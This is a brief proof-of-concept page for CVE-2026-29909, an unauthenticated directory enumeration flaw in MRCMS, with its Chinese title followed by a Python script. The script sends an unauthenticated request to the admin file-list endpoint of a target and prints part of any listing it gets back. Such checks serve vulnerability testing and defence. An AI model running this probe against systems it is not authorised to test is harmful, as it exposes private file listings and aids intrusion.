CVE-2026-29909 MRCMS未认证目录枚举漏洞

import requests def check_vulnerability(target_url): """ Checks for CVE-2026-29909 directory enumeration vulnerability. """ # The vulnerable endpoint identified in the CVE description endpoint = "/admin/file/list.do" full_url = f"{target_url}{endpoint}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: # Sending request without authentication cookies response = requests.get(full_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Potential vulnerability detected at {full_url}") print(f"[+] Response content (first 200 chars): {response.text[:200]}") else: print(f"[-] Endpoint returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") # Usage example # check_vulnerability("http://127.0.0.1:8080")